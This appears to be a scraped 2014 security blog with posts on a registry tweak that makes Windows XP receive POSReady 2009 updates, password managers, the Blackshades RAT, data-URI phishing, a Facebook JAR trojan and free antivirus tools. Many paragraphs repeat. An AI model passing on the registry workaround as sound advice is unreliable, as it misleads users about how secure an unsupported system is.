Many of the multi-site breaches centered on franchise business models. As such, the information technology used must be strong, Trustwave advised. “Franchisees are often required to deploy information technology defined by the franchisor for efficiency purposes and to simplify management of those environments,” the company noted. “While a well-designed technology template can help to improve security, a poor design can result in a vulnerability present across potentially thousands of locations. If an attacker discovers and takes advantage of a flaw at one franchise, they can replicate the exploit at other locations.”
Monday, June 9, 2014
Windows XP can get updates till today!
Microsoft stopped its support for Windows XP officially on April 8, 2014. This move made a large number of users to switch to the latest version of Windows, but still a wide range of users are using Microsoft oldest and most widely used operating system XP despite not receiving security updates from Microsoft.
But some companies and organizations who were not able to migrate their operating system’s running Windows XP to another operating system before the support phase ended, are still receiving updates by paying Microsoft for the security patches and updates. Now a relatively simple method has emerged as a trick for the XP users which makes it possible to receive Windows XP security updates for the next five years i.e. until April 2019.
It makes use of updates for Windows Embedded POSReady 2009 based on Windows XP Service Pack 3, because the security updates which are being released for POSReady 2009 are the same updates Microsoft would have rolled out for its Windows XP, if it was still supporting XP Operating System.
Windows Embedded POSReady 2009 is the operating system installed in "point-of-sale" (POS) systems such as restaurant machine, ticket machines or other customized version of Windows Embedded systems. POS machine most likely uses the XP operating system, therefore receives the same updates that are delivered by Microsoft for the officially unsupported version of Windows XP.
You are not allowed to directly install these Windows updates for your OS. In order to download new security updates for your Windows XP, you just need to perform a simple intervention into the Windows registration database.
FOLLOW THESE STEPS:
But some companies and organizations who were not able to migrate their operating system’s running Windows XP to another operating system before the support phase ended, are still receiving updates by paying Microsoft for the security patches and updates. Now a relatively simple method has emerged as a trick for the XP users which makes it possible to receive Windows XP security updates for the next five years i.e. until April 2019.
It makes use of updates for Windows Embedded POSReady 2009 based on Windows XP Service Pack 3, because the security updates which are being released for POSReady 2009 are the same updates Microsoft would have rolled out for its Windows XP, if it was still supporting XP Operating System.
Windows Embedded POSReady 2009 is the operating system installed in "point-of-sale" (POS) systems such as restaurant machine, ticket machines or other customized version of Windows Embedded systems. POS machine most likely uses the XP operating system, therefore receives the same updates that are delivered by Microsoft for the officially unsupported version of Windows XP.
You are not allowed to directly install these Windows updates for your OS. In order to download new security updates for your Windows XP, you just need to perform a simple intervention into the Windows registration database.
FOLLOW THESE STEPS:
1. Open Notepad and create a new file.
2. Add Below given code to it:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\WPA\PosReady]
"Installed"=dword:00000001
2. Add Below given code to it:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\WPA\PosReady]
"Installed"=dword:00000001
3. Save file as .reg (test.reg) extension and run it by double clicks.
4. Once executed, you will find lots of pending updates in your Windows Action Center.
Because the extended support for Windows Embedded POSReady 2009 systems ends after 5 years, Microsoft will continue to deliver new security updates and patches for this version of its embedded operating system till April 9th, 2019, so users can use this trick to get security updates of Windows XP for another five years.
Despite receiving security updates for Windows XP by using such tricks, it is not possible to secure the complete system appropriately. So all of you to upgrade your operating system to the latest versions, i.e. Windows 7 or 8 or any Linux OS.
4. Once executed, you will find lots of pending updates in your Windows Action Center.
Because the extended support for Windows Embedded POSReady 2009 systems ends after 5 years, Microsoft will continue to deliver new security updates and patches for this version of its embedded operating system till April 9th, 2019, so users can use this trick to get security updates of Windows XP for another five years.
Despite receiving security updates for Windows XP by using such tricks, it is not possible to secure the complete system appropriately. So all of you to upgrade your operating system to the latest versions, i.e. Windows 7 or 8 or any Linux OS.
Thursday, May 29, 2014
Secure your passwords with Password Manager
Using a different password for every online site and service is critical to your cyber security.
There's a war raging between hackers and companies, and you're caught in the crossfire. Every time a company gets hacked, you have to change your password. And don't you dare reuse it somewhere else.
Dreaming up a different password for every site and service is the only way to keep your stuff safe online, but it's also a gigantic nuisance. There's one thing you can and should do to help: Get a password manager program. Password managers hide your information behind a master password that only you know.
There is a way to manage all your passwords together i.e., password manager, here are the password manager softwares; 1Password, Dashlane, LastPass and PasswordBox.
LastPass is a good choice for people who use newer technology like fingerprint scanners. For the really paranoid, 1Password offers the most control over where your encrypted vault of passwords gets stored.
For most people, I recommend Dashlane. It's simple, so you'll actually use it. It may even save you clicks.
Nothing is 100% guaranteed, but all four of these managers take the additional security step of never sending your master password over the Internet. They're like a safe-deposit box that a professional keeps without knowing what's inside, or even holding a key to open it.
In an age where more of our personal information lives, password protected, up in the cloud, we need defenses beyond antivirus software. Using a password manager is the next step.
Now keep all your passwords in a password manager and relax.
There's a war raging between hackers and companies, and you're caught in the crossfire. Every time a company gets hacked, you have to change your password. And don't you dare reuse it somewhere else.
Dreaming up a different password for every site and service is the only way to keep your stuff safe online, but it's also a gigantic nuisance. There's one thing you can and should do to help: Get a password manager program. Password managers hide your information behind a master password that only you know.
There is a way to manage all your passwords together i.e., password manager, here are the password manager softwares; 1Password, Dashlane, LastPass and PasswordBox.
LastPass is a good choice for people who use newer technology like fingerprint scanners. For the really paranoid, 1Password offers the most control over where your encrypted vault of passwords gets stored.
For most people, I recommend Dashlane. It's simple, so you'll actually use it. It may even save you clicks.
Nothing is 100% guaranteed, but all four of these managers take the additional security step of never sending your master password over the Internet. They're like a safe-deposit box that a professional keeps without knowing what's inside, or even holding a key to open it.
In an age where more of our personal information lives, password protected, up in the cloud, we need defenses beyond antivirus software. Using a password manager is the next step.
Now keep all your passwords in a password manager and relax.
Monday, May 26, 2014
Blackshades malware spies through your webcam
In the old days, one simply had to draw their blinds to avoid peeping toms from spying on their private business. Now, it seems that even with the shades drawn, one must also shutter their webcam. Earlier this week, the FBI initiated a crackdown leading to the arrest of nearly 100 users of a program called Blackshades malware. This program allows hackers to remotely access the computers of their victims, enabling them to steal files, log passwords, and even turn on microphones and webcams unnoticed. This spying software could be purchased online for as little as $40 U.S.D.
Blackshades malware is referred to as a remote access tool (RAT), meaning it allows the hacker to gain full access to your machine as if he were sitting right in front of it. The technology behind this threat is similar to that used by the IT department at your office. When Joe IT Guy needs to access your work computer to install updates, fix an issue with your settings, or remotely control your machine for a variety of other reasons, he can with advanced warning and mutual understanding that he has the right to do so. Perpetrators of Blackshades malware aren’t quite as courteous.
Prior to the FBI crackdown this week, anyone with an Internet connection could purchase the Blackshades software, and they didn’t need to be a skilled hacker to use it, either. As security blogger Brian Krebs put it, “Blackshades was a tool created and marketed principally for buyers who wouldn’t know how to hack their way out of a paper bag.” The ease of use (and ease of purchase) associated with Blackshades malware illustrates the “hacking as a service” phenomenon, where anyone with the financial means necessary can become a cybercriminal. The software even came with tools known as “spreaders” which helped these novice cybercriminals distribute malicious links via social media, in an effort to infect more computers. As with most other malware attacks, Blackshades relies on you visiting an infected website or downloading an infected file in order to install a hacker’s malicious software on your computer.
The prepackaged malware also came with tools to help cybercriminals extract money from their victims, otherwise known as ransomware. Ransomware works by allowing the hacker to lock or encrypt files (sometimes even locking you out of your device completely), and then demand money in exchange for allowing you to regain access.
Blackshades malware is a multidimensional, robust software program with a relatively puny price tag. And just because the FBI has cracked down on its users, doesn’t mean it’s disappeared from the Web completely. In fact, this strain of malware has been around for years.
Here are some steps you can take to protect yourself from virtual peeping toms:
Blackshades malware is referred to as a remote access tool (RAT), meaning it allows the hacker to gain full access to your machine as if he were sitting right in front of it. The technology behind this threat is similar to that used by the IT department at your office. When Joe IT Guy needs to access your work computer to install updates, fix an issue with your settings, or remotely control your machine for a variety of other reasons, he can with advanced warning and mutual understanding that he has the right to do so. Perpetrators of Blackshades malware aren’t quite as courteous.
Prior to the FBI crackdown this week, anyone with an Internet connection could purchase the Blackshades software, and they didn’t need to be a skilled hacker to use it, either. As security blogger Brian Krebs put it, “Blackshades was a tool created and marketed principally for buyers who wouldn’t know how to hack their way out of a paper bag.” The ease of use (and ease of purchase) associated with Blackshades malware illustrates the “hacking as a service” phenomenon, where anyone with the financial means necessary can become a cybercriminal. The software even came with tools known as “spreaders” which helped these novice cybercriminals distribute malicious links via social media, in an effort to infect more computers. As with most other malware attacks, Blackshades relies on you visiting an infected website or downloading an infected file in order to install a hacker’s malicious software on your computer.
The prepackaged malware also came with tools to help cybercriminals extract money from their victims, otherwise known as ransomware. Ransomware works by allowing the hacker to lock or encrypt files (sometimes even locking you out of your device completely), and then demand money in exchange for allowing you to regain access.
Blackshades malware is a multidimensional, robust software program with a relatively puny price tag. And just because the FBI has cracked down on its users, doesn’t mean it’s disappeared from the Web completely. In fact, this strain of malware has been around for years.
Here are some steps you can take to protect yourself from virtual peeping toms:
- Do not click on links from unknown senders
- Use web protection when surfing online
- Avoid attachments from unknown senders
- Download apps, music, and movies from official sources
- Install comprehensive security on your system
Read this article also at: http://blogs.mcafee.com/consumer/blackshades-malware?lqmcat=Social:FB:WW:post:null:link:internal&utm_campaign=blog&utm_source=ncsa&utm_medium=facebook
Microsoft ends support for Windows XP and Office 2003
Microsoft is ending support for the Windows XP operating system and Office 2003 product line on April 8, 2014. After this date, these products will no longer receive:
All software products have a lifecycle. End of support refers to the date when Microsoft no longer provides automatic fixes, updates, or online technical assistance. As of February 2014, nearly 30 percent of Internet-connected PCs still run Windows XP.
Microsoft will send “End of Support” notifications to users of Windows XP who have elected to receive updates via Windows Update. Users in organizations using Windows Server Update Services (WSUS), System Center Configuration manager, or Windows Intune will not receive the notification.
The Impact
Computer systems running unsupported software are exposed to an elevated risk to cybersecurity dangers, such as malicious attacks or electronic data loss.
Users may also encounter problems with software and hardware compatibility since new software applications and hardware devices may not be built for Windows XP or Office 2003.
Organizations that are governed by regulatory obligations may find they are no longer able to satisfy compliance requirements.
What is the Solution?
Computers operating Windows XP with SP3 or running Office 2003 products will continue to work after support ends. However, using unsupported software may increase the risk of viruses and other security threats.
Users have the option to upgrade to a currently supported operating system or office productivity suite. The Microsoft “End of Support” pages for Windows XP andOffice 2003 offer additional details.
There are software vendors and service providers in the marketplace who offer assistance in migrating from Windows XP or Office 2003 to a currently supported operating system or office productivity suite.
Users who choose to continue using Windows XP after the end of support may mitigate some risks by using a web browser other than Internet Explorer. The Windows XP versions of some alternative browsers will continue to recieve support temporarily. Users should consult the support pages of their chosen alternative browser for more details.
- Security patches which help protect PCs from harmful viruses, spyware, and other malicious software
- Assisted technical support from Microsoft
- Software and content updates
All software products have a lifecycle. End of support refers to the date when Microsoft no longer provides automatic fixes, updates, or online technical assistance. As of February 2014, nearly 30 percent of Internet-connected PCs still run Windows XP.
Microsoft will send “End of Support” notifications to users of Windows XP who have elected to receive updates via Windows Update. Users in organizations using Windows Server Update Services (WSUS), System Center Configuration manager, or Windows Intune will not receive the notification.
The Impact
Computer systems running unsupported software are exposed to an elevated risk to cybersecurity dangers, such as malicious attacks or electronic data loss.
Users may also encounter problems with software and hardware compatibility since new software applications and hardware devices may not be built for Windows XP or Office 2003.
Organizations that are governed by regulatory obligations may find they are no longer able to satisfy compliance requirements.
What is the Solution?
Computers operating Windows XP with SP3 or running Office 2003 products will continue to work after support ends. However, using unsupported software may increase the risk of viruses and other security threats.
Users have the option to upgrade to a currently supported operating system or office productivity suite. The Microsoft “End of Support” pages for Windows XP andOffice 2003 offer additional details.
There are software vendors and service providers in the marketplace who offer assistance in migrating from Windows XP or Office 2003 to a currently supported operating system or office productivity suite.
Users who choose to continue using Windows XP after the end of support may mitigate some risks by using a web browser other than Internet Explorer. The Windows XP versions of some alternative browsers will continue to recieve support temporarily. Users should consult the support pages of their chosen alternative browser for more details.
So Windows XP users must migrate to Windows7 otherwise be careful about viruses and cyber threats.
Saturday, May 24, 2014
Apple iCloud stormed by Dutch Hackers
Apple cloud service "iCloud" is probably one of the secure cloud service owned by the Apple Inc. It the same cloud storage and cloud computing service provided by the Apple Inc. to its users since October 2011 with more than 320 million users across the world.
According to a report from Dutch news organization De Telegraaf, the hackers purchased locked iPhone devices for $50 to $150 each and then bypassed Apple’s iCloud activation lock through a serious security vulnerability Apple has failed to patch with its most recent updates. iCloud service allows users to store and back-up data such as music, photos, applications, documents, bookmarks, reminders, backups, notes, iBooks, and contacts, and provides a platform for Apple's email servers and calendars.
Couple of the hackers go by the name AquaXetine and Moroccan hacker with the name Merruktechnolog, have claimed to hack the Apple iCloud system. Hackers have used the Man-in-Middle attack for the hack of the Apple locked devices.
According to a report from Dutch news organization De Telegraaf, the hackers purchased locked iPhone devices for $50 to $150 each and then bypassed Apple’s iCloud activation lock through a serious security vulnerability Apple has failed to patch with its most recent updates. iCloud service allows users to store and back-up data such as music, photos, applications, documents, bookmarks, reminders, backups, notes, iBooks, and contacts, and provides a platform for Apple's email servers and calendars.
Security experts says that hackers can do more thing with the vulnerability. Attacker can read the message and also steal the Apple ID credentials from the devices. Hackers have worked for five months to breach the security of Apple iCloud system. Last day Doulci hacker group on their twitter have posted that the group have “processed” more than 5,700 Apple devices in just five minutes using the hack. With the good intention and with ethical subject, hackers have reported the vulnerability to Apple Security team back in March, but Apple team have never responded to their vulnerability report.
This makes the hackers to disclose the vulnerability publicly. The pair of hackers are offering unlocking services via doulCi.nl website, according to information found on their website. With this doulCi is the world’s first Alternative iCloud Server, and the world’s first iCloud Activation Bypass.
Wednesday, May 21, 2014
Tips from cyber experts to tread safely
They know the risks of the internet better than anyone, but most cyber experts still shop and bank online with care.
"We operate in the 21st century ... I've got to shop online, I've got to pay my bills online," Brigadier General Paul Nakasone, deputy commander of US Army Cyber Command, said at the Reuters Cybersecurity Summit.
"You can't really function without it," agreed Nart Villeneuve, researcher at the cybersecurity firm FireEye.
Some actions can leave you wide open for data abuse, like checking into a hotel and handing over a credit card, he said. "I guess you could pull up with a money clip but I don't know that you can even do that," he said.
The tricks that the smartest cybersecurity minds use for online safety hygiene are basic: Avoid websites that are visibly questionable, don't thoughtlessly click on links or attachments, monitor your account activity regularly and only give away the minimum amount of information.
On passwords, the bulwark of online security, experts also stuck to simple rules: Make them complex and change regularly. Some also said they use more secure login processes when available.
"I tend to be a bit of a two-factor authentication freak," said Eddie Schwartz, cyber chief at Verizon, saying he always takes advantage of any extra security steps offered, like
confirming his login with a code sent to his cellphone.
Another key to safe online shopping and banking is using internet connections that are as secure as possible.
"I never do it on the road. I never do it from my mobile device," said Michael Hayden, former director of the CIA and the National Security Agency.
While most experts avoid using public wireless internet connections, some go further.
"I have a separate computer and router for financial transactions," said Dan Kaufman, director of information innovation at the Defense Advanced Research Projects Agency (DARPA), the arm of the US Defense Department credited with inventing the internet.
Kaufman said he searches for potential online purchases on one computer, them moves to a second computer to make the transaction.
Digital Bond CEO Dale Peterson had a similar strategy: a separate computer, "with its own 20-plus character password," for online banking and payroll purposes.
In a breach revealed in December by US retailer Target Corp, some 40 million credit or debit card records and 70 million other customer records, such as addresses and telephone numbers, were stolen. The perpetrators remain at large.
Several cyber experts said they felt less concerned about the potential to lose credit card data, because of limited liability, but draw the line at online banking and modern conveniences like depositing checks by smartphone.
"I'm paranoid about online banking," said Stuart McClure, CEO of security firm Cylance. "I'm a little bit more comfortable now but I hate to do online banking. I hate it.
"I used to change my passwords so much that I'd forget them over time. And I never ever put my PIN into anything electronic, only physical devices. And even then, I'm pulling up, looking for skimmers," he said, referring to devices made to secretly swipe card information from ATM machines.
Is total avoidance a solution?
"I am not one who says that the answer is to withdraw from the digital world that we live in. I just don't think that's particularly realistic," said Admiral Mike Rodgers, the new director of the NSA. "Let's deal with the world the way it is."
"We operate in the 21st century ... I've got to shop online, I've got to pay my bills online," Brigadier General Paul Nakasone, deputy commander of US Army Cyber Command, said at the Reuters Cybersecurity Summit.
"You can't really function without it," agreed Nart Villeneuve, researcher at the cybersecurity firm FireEye.
Some actions can leave you wide open for data abuse, like checking into a hotel and handing over a credit card, he said. "I guess you could pull up with a money clip but I don't know that you can even do that," he said.
The tricks that the smartest cybersecurity minds use for online safety hygiene are basic: Avoid websites that are visibly questionable, don't thoughtlessly click on links or attachments, monitor your account activity regularly and only give away the minimum amount of information.
On passwords, the bulwark of online security, experts also stuck to simple rules: Make them complex and change regularly. Some also said they use more secure login processes when available.
"I tend to be a bit of a two-factor authentication freak," said Eddie Schwartz, cyber chief at Verizon, saying he always takes advantage of any extra security steps offered, like
confirming his login with a code sent to his cellphone.
Another key to safe online shopping and banking is using internet connections that are as secure as possible.
"I never do it on the road. I never do it from my mobile device," said Michael Hayden, former director of the CIA and the National Security Agency.
While most experts avoid using public wireless internet connections, some go further.
"I have a separate computer and router for financial transactions," said Dan Kaufman, director of information innovation at the Defense Advanced Research Projects Agency (DARPA), the arm of the US Defense Department credited with inventing the internet.
Kaufman said he searches for potential online purchases on one computer, them moves to a second computer to make the transaction.
Digital Bond CEO Dale Peterson had a similar strategy: a separate computer, "with its own 20-plus character password," for online banking and payroll purposes.
In a breach revealed in December by US retailer Target Corp, some 40 million credit or debit card records and 70 million other customer records, such as addresses and telephone numbers, were stolen. The perpetrators remain at large.
Several cyber experts said they felt less concerned about the potential to lose credit card data, because of limited liability, but draw the line at online banking and modern conveniences like depositing checks by smartphone.
"I'm paranoid about online banking," said Stuart McClure, CEO of security firm Cylance. "I'm a little bit more comfortable now but I hate to do online banking. I hate it.
"I used to change my passwords so much that I'd forget them over time. And I never ever put my PIN into anything electronic, only physical devices. And even then, I'm pulling up, looking for skimmers," he said, referring to devices made to secretly swipe card information from ATM machines.
Is total avoidance a solution?
"I am not one who says that the answer is to withdraw from the digital world that we live in. I just don't think that's particularly realistic," said Admiral Mike Rodgers, the new director of the NSA. "Let's deal with the world the way it is."
Saturday, May 17, 2014
A New Phishing method to steal Google account details
Security experts at Bitdefender discovered a new ingenious phishing scheme that is being used by hackers to steal Google Account credentials.
Security experts at Bitdefender have discovered a news phishing scheme adopted by hackers to steal Google Account passwords.
The new phishing attack is hard to catch with traditional heuristic detection, it mainly affects Google Chrome and Mozilla Firefox internet browsers.
The hackers send an email that pretends to be from Google, it warns victim that his account will be locked in the next 24 hours because the associated InBox has reached the maximum capability.
“With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,”“The scam starts with an email allegedly sent by Google, with “Mail Notice” or “New Lockout Notice” as a subject.” reports Catalin Cosoi, chief security strategist at Bitdefender in the official blog post.
To avoid that the Google account will be “locked in 24 hours” the user is invited to go to the “INSTANT INCREASE” link, but the link redirects victims to a bogus Google web log-page. Using this artifice, hackers can steal Google account credentials within the browser.
Cosoi explained that it is very difficult for users to note the attack because the fake Google web log-page goes undetected by Google’s Chrome uniform resource identifiers (URIs). The attackers exploit the way Google Chrome displays “data:” URIs.
Users will display “data:” in the address bar of their browser, which indicates the use of a data Uniform Resource Identifier scheme, the URI scheme allows attackers to include data in-line in web pages as if they were external resources.
“The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string within the data URI. As Google Chrome doesn’t show the whole string, regular users have a hard time figuring out they are targeted in a phishing attack and may give their data to cyber-criminals.” states the post.
Bitdefender says that the scammers are able to avoid detection, by using a data URI scheme, which includes data in-line web pages as if they are external sources. The content from the fake webpage is encoded in the string with the data URI scheme, the attackers used Base64 coding to represent the file contents.
According Bitdefender the more than a thousand users were deceived by the phishing scheme.
“So far, more than a thousand users clicked on a single shortened URL used in the cyber-campaign. The numbers are without doubt a lot higher, as scammers create more than a single URL when crafting a phishing wave,” added Cosoi.
Phishing is becoming one of the most popular fraudulent activities in the cyber criminal ecosystem, hackers are exploiting new platforms like mobile and social media according the report of principal security firms.
Cyber criminals are trying to make phishing attacks harder to detect optimizing their email targeting, attackers are demonstrating to be able to find new methods of bypassing checks implemented by email providers and security firms.
Usually a targeted attack exploits the “human factor“, phishing offensives rely on social engineering techniques that is why is important to inform users of the tactics adopted by cyber criminals.
Organisations must train their personnel to reduce their human attack surface and avoid to be victims of such attacks.
So, Be careful while using Google accounts.
Security experts at Bitdefender have discovered a news phishing scheme adopted by hackers to steal Google Account passwords.
The new phishing attack is hard to catch with traditional heuristic detection, it mainly affects Google Chrome and Mozilla Firefox internet browsers.
The hackers send an email that pretends to be from Google, it warns victim that his account will be locked in the next 24 hours because the associated InBox has reached the maximum capability.
“With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,”“The scam starts with an email allegedly sent by Google, with “Mail Notice” or “New Lockout Notice” as a subject.” reports Catalin Cosoi, chief security strategist at Bitdefender in the official blog post.
To avoid that the Google account will be “locked in 24 hours” the user is invited to go to the “INSTANT INCREASE” link, but the link redirects victims to a bogus Google web log-page. Using this artifice, hackers can steal Google account credentials within the browser.
Cosoi explained that it is very difficult for users to note the attack because the fake Google web log-page goes undetected by Google’s Chrome uniform resource identifiers (URIs). The attackers exploit the way Google Chrome displays “data:” URIs.
Users will display “data:” in the address bar of their browser, which indicates the use of a data Uniform Resource Identifier scheme, the URI scheme allows attackers to include data in-line in web pages as if they were external resources.
“The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string within the data URI. As Google Chrome doesn’t show the whole string, regular users have a hard time figuring out they are targeted in a phishing attack and may give their data to cyber-criminals.” states the post.
Bitdefender says that the scammers are able to avoid detection, by using a data URI scheme, which includes data in-line web pages as if they are external sources. The content from the fake webpage is encoded in the string with the data URI scheme, the attackers used Base64 coding to represent the file contents.
According Bitdefender the more than a thousand users were deceived by the phishing scheme.
“So far, more than a thousand users clicked on a single shortened URL used in the cyber-campaign. The numbers are without doubt a lot higher, as scammers create more than a single URL when crafting a phishing wave,” added Cosoi.
Phishing is becoming one of the most popular fraudulent activities in the cyber criminal ecosystem, hackers are exploiting new platforms like mobile and social media according the report of principal security firms.
Cyber criminals are trying to make phishing attacks harder to detect optimizing their email targeting, attackers are demonstrating to be able to find new methods of bypassing checks implemented by email providers and security firms.
Usually a targeted attack exploits the “human factor“, phishing offensives rely on social engineering techniques that is why is important to inform users of the tactics adopted by cyber criminals.
Organisations must train their personnel to reduce their human attack surface and avoid to be victims of such attacks.
So, Be careful while using Google accounts.
Thursday, May 15, 2014
JAR file malware a threat on Facebook
Cyber Criminals are back with another way to get there victim via the popular social network Facebook. Recently many of the facebook users have got a message from there trusted friends or from unknown person which includes a ZIP file with the "LOL" text.
If you have also got the same message in your inbox and that also from your trusted friend then you might download without any hesitation. Actually this ZIP file contains a malicious JAR file. The file contains the Trojan horse virus circulating via Facebook messenger.
This Malware campaign was spotted by Malwarebytes in early March. They explain that the Trojan spreads itself through the Facebook’s Messenger service (inbox) by messaging a victim pretending to be one of their friends saying "LOL" with a zip file attached, which appears to be a photo, named "IMG_XXX.zip"
How It Works ?
User gets a Facebook instant message from a friend, which includes the words ‘LOL’ and a file waiting to be downloaded.
The user downloads the file because they can assume it can be trusted. The filename matches the usual filename of a photo: ‘IMG_xxxx’.zip.
Once downloaded, the user unzips the file and clicks on what they assume is an image file, still called IMG_xxxx.jar
The JAR file executes, downloads malware and infects the system.
The infected users Facebook account is compromised and then used to send more malware to the users Facebook friends.
How To Protect yourself?
As in the Malware bytes explanation where they have analyzed the malicious file, they found that its a Trojan Virus, and with the online virus scan, it is giving 27/50 virus detection ratio. If you are getting it from one of your trusted friend, then ask them about the message and file containing with it. If they denies for sending then simply DO NOT DOWNLOAD it.
If you have downloaded the file, then you might have infected with the Trojan horse virus. So if you think you are affected to it, then scan your computer with the trusted and reputed antivirus program.
We recommend our users to keep up-to-date your antivirus program always and use trusted programs. Don't download any file from net without the prior information. Always download the stuff from the trusted sites only.
If you have also got the same message in your inbox and that also from your trusted friend then you might download without any hesitation. Actually this ZIP file contains a malicious JAR file. The file contains the Trojan horse virus circulating via Facebook messenger.
This Malware campaign was spotted by Malwarebytes in early March. They explain that the Trojan spreads itself through the Facebook’s Messenger service (inbox) by messaging a victim pretending to be one of their friends saying "LOL" with a zip file attached, which appears to be a photo, named "IMG_XXX.zip"
User gets a Facebook instant message from a friend, which includes the words ‘LOL’ and a file waiting to be downloaded.
The user downloads the file because they can assume it can be trusted. The filename matches the usual filename of a photo: ‘IMG_xxxx’.zip.
Once downloaded, the user unzips the file and clicks on what they assume is an image file, still called IMG_xxxx.jar
The JAR file executes, downloads malware and infects the system.
The infected users Facebook account is compromised and then used to send more malware to the users Facebook friends.
How To Protect yourself?
As in the Malware bytes explanation where they have analyzed the malicious file, they found that its a Trojan Virus, and with the online virus scan, it is giving 27/50 virus detection ratio. If you are getting it from one of your trusted friend, then ask them about the message and file containing with it. If they denies for sending then simply DO NOT DOWNLOAD it.
If you have downloaded the file, then you might have infected with the Trojan horse virus. So if you think you are affected to it, then scan your computer with the trusted and reputed antivirus program.
We recommend our users to keep up-to-date your antivirus program always and use trusted programs. Don't download any file from net without the prior information. Always download the stuff from the trusted sites only.
Monday, May 12, 2014
Best free antivirus software 2014
Anyone who has been following the news about the Heartbleed Bug a vulnerability in OpenSSL that enables hackers to gain access to the memory of web servers understands just how dangerous the web can be. In addition to security flaws like Heartbleed, viruses, spyware and phishing sites make it possible for hackers to expose crucial data. To ensure better protection, every PC owner needs effective, reliable antivirus software. Unfortunately, this can be expensive, especially given the cost of annual updates.
However, there are plenty of free antivirus software solutions on the market, We've picked out nine of the best free internet security tools to deliver great security at no cost.
1. Avast Free Antivirus
The program is simple to install; a straightforward interface makes it easy to use; a quick first scan should identify any potential threats on your PC, and this all has minimal impact on your system performance.
These aren't just subjective opinions, either. Independent testing by AV-Test has found the program to be a good all-rounder, and it was one of AV-Comparative's "Products of 2012."
Avast Free has some useful extras, too. A Software Updater alerts you to program updates you've missed, for instance, while its Browser Cleanup tool provides a simple way to remove unwanted add-ons from your browsers.
Avast recently added a "Grime Fighter," which the company says supports 12 additional languages and offers an advanced console for more user control.
2. Panda Cloud Antivirus Free
Small and simple, Panda Cloud Antivirus is a lightweight tool which provides free real-time antivirus protection, and can be used alongside many other security tools without problems.
It's the free version of a commercial product, and so has a few missing features. The Pro edition helps to protect you at public wifi networks, for instance, while its "USB Vaccine" function reduces the risk of malware infecting a USB drive.
The core antivirus protection remains the same, though. And while that doesn't deliver the top detection rates, independent testing shows it's very capable, with the program winning certification in AV-Test's latest report.
3. ZoneAlarm Free Antivirus + Firewall
We have one or two concerns about ZoneAlarm Free Antivirus + Firewall, notably that its antivirus database is only updated daily (hourly updates are reserved for the commercial version), which leaves you more exposed to the very latest threats,
The program does provide plenty of functionality, though, with a capable, AV-Test-certified antivirus engine, an easy-to-use firewall and some browsing protection.
It does its best to keep things simple. Open the Preferences dialog, say, and you'll find only 10 buttons and settings (and most of those you'll never need to use).
The database update means it wouldn't be our first choice, but if you're a fan of ZoneAlarm, or just want a firewall and antivirus tool from the same company, this could be a good choice.
4. Avira Free Antivirus
Avira Free Antivirus provides two main areas of protection.
A strong antivirus engine (rated highly by independent labs for its file detection rates) constantly monitors your PC, looking for and eliminating threats.
If you choose to install the Avira toolbar then you also get some web tools (an antiphishing tool, ad blocker, social networking protection), although this also replaces your default search engine with an Avira page.
Problems? The interface can seem a little complex, just at first. And the program has more impact on your PC's performance than some other tools. Still, on balance Avira Free Antivirus remains a capable and effective security package.
Avira recently made available the Avira Protection Cloud (APC), which will be used to detect and thwart zero-day attacks, according to the company. The technology will be available to all users of the free software by the end of May.
5. Bitdefender Antivirus Free Edition
Bitdefender's antivirus engine is one of the best around, and a favourite of the independent testing labs, so getting a free version sounds very appealing indeed.
The program is ultra-compact, downloading and installing in less than a minute on our test PC (although it does demand removal of any incompatible products first). A very basic interface then provides effective on-demand and automatic scanning, real-time antivirus and antiphishing protection.
There are very few manual controls here: no settings, no options, no scan types, no scheduling, nothing at all, perhaps an issue if you like to fine tune your security. But if you prefer simplicity then Bitdefender Antivirus Free Edition is an excellent choice.
6. AVG Free Antivirus
AVG Free Antivirus is a solid package with a good range of features: an antivirus engine, email scanner, identity theft protection, and LinkScanner Surf-Shield to keep you safe online.
At first glance this makes the program seem more complex, as there are lots of tiles, buttons and menu entries. Smart interface design means you can carry out most common actions in a click or two, though, so you'll soon feel at home.
AVG Free Antivirus gets mixed reviews on its effectiveness: AV-Comparatives rate it as average, AV-Test say it's better than some commercial suites. Our view: it's a capable, feature-packed tool, and one of the stronger free antivirus packages.
To boost its offering, AVG recently released the AVG Zen tool, which the company claims is designed to help provide added protection across desktops and mobile devices.
Why isn't Microsoft Security Essentials in the list? It's small, simple, and won't slow your system down - but it's also just not reliable enough to justify inclusion in our best free antivirus software round-up.
When Security Essentials was last included in an AV Comparatives File Detection test, the program managed a file detection rate of 94.9%, placing it 13th out of 15. AV-Test's opinion was even lower. In its analysis of 2012 products for Home Users, Microsoft Security Essentials delivered the lowest "average protection score" of all, putting it bottom in a list of 20.
7. Emsisoft Emergency Kit
No antivirus program comes with a guaranteed 100% detection rate, and malware might occasionally slip through your defences. You should always have a second tool available, then, just in case - and Emsisoft Emergency Kit (EEK) is a great choice.
The program runs without requiring installation, reducing the chance of any conflicts with your existing antivirus package.
Its straightforward system scanner uses a dual-scan-engine, rated highly by Virus Bulletin (and which did actually achieve a 100% detection rate in a recent AV-Comparatives test).
And experienced users will appreciate tools like HiJackFree and BlitzBlank, which can help you manually detect and clean up malware.
8. FortiNet FortiClient
While they're best known in the corporate world of network security appliances, FortiNet also produce a capable antivirus tool, FortiClient, which is free for home users.
The program can be installed in two modes. The standard option provides a good range of tools: an antivirus engine, simple parental controls, an application firewall, vulnerability scanning and more. But you can also run FortiClient without its real-time protection, perfect if you need to run it alongside an existing antivirus tool without conflicts.
Our tests suggest it's not the best antivirus engine around, but is still worth having. AV-Test and AV-Comparatives confirm that it's a good mid-range contender, and FortiClient could be particularly helpful if you want a second-line tool to run alongside an existing antivirus engine.
9. 360 Internet Security 2013
Qihoo is a Chinese software company which has had enormous success in its home market (it claims 450 million users), but now it's branching out with its first international release, 360 Internet Security 2013.
Despite its name, this isn't a full internet security suite - there's no spam filter, firewall or parental controls - but installing the program does get you no less than three antivirus engines: BitDefender, its own QVM II, and Cloud 360.
These delivered accurate results for us, and the independent testing labs have also reported positive results for Qihoo products in the past year (AV Comparatives has certified it as "Windows 8 approved", for instance).
